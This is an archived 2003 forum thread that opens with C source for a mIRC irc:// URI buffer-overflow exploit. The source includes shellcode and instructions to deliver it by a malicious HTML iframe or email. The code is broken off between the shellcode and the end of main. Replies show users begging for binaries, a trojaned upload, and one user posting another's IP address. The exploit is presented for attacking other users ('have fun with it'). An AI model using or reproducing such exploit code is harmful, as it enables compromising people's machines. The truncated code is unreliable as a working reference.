/** gEEk-(filtered)-khaled.c -- remote mirc < 6.11 exploit by blasty ** ** TESTED ON: Windows XP (No SP, Ducth) Build: 2600.xpclient.010817-1148 ** ** A few days ago, I saw a mIRC advisory on packetstorm [1] and was surprised ** nobody had written an exploit yet. So I decided to start writing one. ** Since this was my first time coding a exploit for windows, it took some ** research before I got the hang of it. (Ollydbg is much more confusing then GDB btw :P) ** ** This exploits (ab)uses the bug in irc:// URI handling. It contains a buffer- ** overflow, and when more then 998 bytes are given EIP will be overwritten. ** ** At first I was thinking of a simple solution to get this exploitable. Since ** giving an URI with > 998 chars to someone on IRC is simply NOT done :) ** Then I remember the iframe-irc:// flaw found by uuuppzz [2] ** ** This exploit will write an malicious HTML file containing an iframe executing the ** irc:// address. So you can give this to anyone on IRC for example;) ** The shellcode included does only execute cmd.exe, because I don't want to be this ** a scriptkiddy util. But, replacing the shellcode with your own is also possible. ** An 400 bytes shellcode (bindshell etc.) easily fits in the buffer, but it may require ** some tweaking. ** After exiting the cmd.exe mIRC will crash, so shellcode its not 100% clean, but who carez :) ** ** Oh yeah, I almost forgot.. this exploit also works even if mIRC isn't started. ** mIRC will start automatically when an irc:// is executed, so you can also send somebody ** and HTML email containing the evil HTML code. (only for poor clients like Outlook Express :P) ** ** Anyway, have fun with it, and dont own complete newb #chans :P ** ** Greetz to: ** inz, demz, gEEkz team ** ** [1] http://www.packetstormsecurity.nl/0310-advisories/mirc61.txt ** [2] http://www.uuuppz.com/research/adv-001-mirc.htm ** ** -- blasty (blasty@geekz.nl / www.geekz.nl) **/
#include <stdio.h>
/* Stupid cmd.exe exec shellcode. hey! I r !evil;) */ unsigned char shellcode[] = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x8b\xec\x55\x8b\xec\x68\x65\x78\x65\x20\x68\x63\x6d\x64\x2e\x8d\x45\xf8\x50\xb8" "\x44\x80\xbf\x77" // 0x78bf8044 <- adress of system() "\xff\xd0"; // call system()
printf("[+] Evil HTML file written!\n"); return(0); } else { // uh oh.. :/ fprintf(stderr, "ERROR: Could not open index.html for writing!\n"); exit(1); } }
thatsmej
Oct 28 2003, 02:28 PM
saw the exploit few days ago....
first thing is saw:
QUOTE
TESTED ON: Windows XP (No SP, Ducth) Build: 2600.xpclient.010817-1148
the maker wrote dutch wrong..
just something i noticed
Anddos
Oct 28 2003, 03:42 PM
someone please compile this
yes100
Oct 28 2003, 03:47 PM
sounds nice, compiling whould be nice
xionoxid
Oct 28 2003, 06:14 PM
I compiled this ! Try and say me if it's working , thx
Anddos
Oct 28 2003, 06:40 PM
no it dosent say anything when u work it in dos u should of tested it before u uped thanks anyway
fabien_pp
Oct 28 2003, 07:10 PM
what is the command of exploit ? please
ssj4conejo
Oct 28 2003, 09:02 PM
WARNING THE FILE UPLOADED BY xionoxid has the beasty virus do not downlaod it, my nav picked it up, fuckin script kiddies at it again. One day i swear .... i will tell ur mommy's so that you can stop uppin beasty, atleast try a different fuckin trojan thats not detectable.. tards.
KoNh
Oct 28 2003, 09:25 PM
Don't u guys ever read :
** The shellcode included does only execute cmd.exe, because I don't want to be this ** a scriptkiddy util. But, replacing the shellcode with your own is also possible.
!!!
And lololol it is so fun, people beging fer compil get virii .. just as it has to be doesn't it ?
vnet576
Oct 28 2003, 09:31 PM
LOL...at least modify the fuckin trojan before u bind and upload it so that our AVs don't pick it up. If u're gonna infect and 0wN all of us u might as well do it right...rofl morons.
Anddos
Oct 28 2003, 09:46 PM
if they keep uploading trojans then why the (filtered) arnt they banned from the forum ?
dissolutions
Oct 28 2003, 10:03 PM
mmmkay my a/v didn't pick it up but o well... xionoxid IP Address: 203.20.58.1
wicked
Oct 28 2003, 10:19 PM
QUOTE (dissolutions @ Oct 28 2003, 10:03 PM)
mmmkay my a/v didn't pick it up but o well... xionoxid IP Address: 203.20.58.1
Crack me up xionoxid maybe you could use some of my advice and make sure that you are anonymous before comming to forums like these lmao.
Advice for xionoxid find post "a Few useful things" download , install proxyrama figgure out how to use it *can't b bothered explaining* USE IT!
ps: click on my little link below
pps: maybe you already are anonymous
another tip: theres to many experienced people and dangerous minds in this forum so i wouldn't be f$%^&g with the wrong one.
........enough said......
neb
Oct 29 2003, 10:21 PM
xionoxid You are A BASTARD !!!! Cheat i just dl this F***** Trojan and now i have difficulties to remove it !!! If someone have information to How remove this cheat i am listening
vnet576
Oct 29 2003, 10:24 PM
I removed this (filtered)'s trojan with trojanhunter:
If you can't even say the magic word "please" I wont compile anything for you... do it yourself goddammit. It's always the same with these kiddies in here, if you don't know how to compile then why in the name of zeuses BUTH*L* do you hack? You are worthless after all without us you can do anything but hacking!
Maybe i sound a bit harsh but what i say is meant, this is a security board and not a board with free leech for exploits, you should be ashamed of yourself!
Also a remote 4byte shellcode does NOT exist! You see something like that: ask yourself some questions...
greets jetprice
chris105
Oct 31 2003, 05:24 PM
I tried to compile but it didnt work
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
